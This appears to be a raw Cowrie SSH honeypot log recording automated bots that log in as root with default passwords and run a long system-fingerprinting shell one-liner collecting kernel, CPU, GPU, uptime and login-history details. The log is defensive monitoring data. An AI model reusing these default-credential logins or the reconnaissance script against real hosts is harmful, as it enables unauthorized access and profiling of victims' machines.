{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.660272Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.661045Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.661947Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.663018Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.663843Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.665168Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.666056Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.668420Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:25:33.669169Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:25:34.101216Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:25:34.102091Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:25:34.123585Z","src_ip":"212.227.125.160","session":"92d3365a6b86"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":6100,"dst_ip":"1.2.3.4","dst_port":22,"session":"1913814dbfda","protocol":"ssh","message":"New connection: 212.227.235.229:6100 (1.2.3.4:22) [session: 1913814dbfda]","sensor":"my-vps","timestamp":"2025-09-08T19:25:43.096854Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OPENSSH_7.9","message":"Remote SSH version: SSH-2.0-OPENSSH_7.9","sensor":"my-vps","timestamp":"2025-09-08T19:25:43.209109Z","src_ip":"212.227.235.229","session":"1913814dbfda"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T19:25:43.321598Z","src_ip":"212.227.235.229","session":"1913814dbfda"}
{"eventid":"cowrie.client.kex","hassh":"b21d7cdcc8133dc2b430d1a039fece20","hasshAlgorithms":"diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,aes128-cbc,aes192-cbc,aes256-cbc,blowfish-cbc,cast128-cbc,3des-cbc;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","aes128-cbc","aes192-cbc","aes256-cbc","blowfish-cbc","cast128-cbc","3des-cbc"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b21d7cdcc8133dc2b430d1a039fece20","sensor":"my-vps","timestamp":"2025-09-08T19:25:44.549226Z","src_ip":"212.227.235.229","session":"1913814dbfda"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:25:44.551174Z","src_ip":"212.227.235.229","session":"1913814dbfda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33744,"dst_ip":"1.2.3.4","dst_port":22,"session":"3a08932d3104","protocol":"ssh","message":"New connection: 212.227.235.229:33744 (1.2.3.4:22) [session: 3a08932d3104]","sensor":"my-vps","timestamp":"2025-09-08T19:26:58.438910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:26:58.439967Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:26:58.715813Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.login.success","username":"root","password":"alpine","message":"login attempt [root/alpine] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:26:59.614485Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:27:00.237058Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.237715Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.238382Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.239498Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.240828Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.241500Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.242124Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.243271Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.243866Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.244412Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.245548Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.246233Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.246792Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.523690Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","size":74,"shasum":"d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/d6c4d77c172f9621774c6ab5652eb71cc483037c77e71185e88a7b9edcaf1287 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.524525Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:27:00.525301Z","src_ip":"212.227.235.229","session":"3a08932d3104"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:27:09.527874Z","src_ip":"212.227.125.160","session":"8e5ea0c6d027"}
{"eventid":"cowrie.session.closed","duration":180.18721103668213,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T19:27:09.532545Z","src_ip":"212.227.125.160","session":"8e5ea0c6d027"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34304,"dst_ip":"1.2.3.4","dst_port":22,"session":"2329399394d5","protocol":"ssh","message":"New connection: 212.227.235.229:34304 (1.2.3.4:22) [session: 2329399394d5]","sensor":"my-vps","timestamp":"2025-09-08T19:28:26.522488Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T19:28:26.542577Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T19:28:26.796860Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.login.success","username":"root","password":"changeme","message":"login attempt [root/changeme] succeeded","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.015618Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T19:28:28.619602Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.command.input","input":"export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","message":"CMD: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s, \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null); [ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime 2>/dev/null | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; }; cpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E \"model name|Hardware\" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,\"\",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo \"UNAME:$uname\"; echo \"ARCH:$arch\"; echo \"UPTIME:$uptime\"; echo \"CPUS:$cpus\"; echo \"CPU_MODEL:$cpu_model\"; echo \"GPU:$gpu_info\"; echo \"CAT_HELP:$cat_help\"; echo \"LS_HELP:$ls_help\"; echo \"LAST:$last_output\"","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.620293Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.621012Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.621949Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.623131Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.623977Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime 2 > /dev/null | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.624650Z","src_ip":"212.227.235.229","session":"2329399394d5"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-09-08T19:28:28.625618Z","src_ip":"212.227.235.229","session":"2329399394d5"}
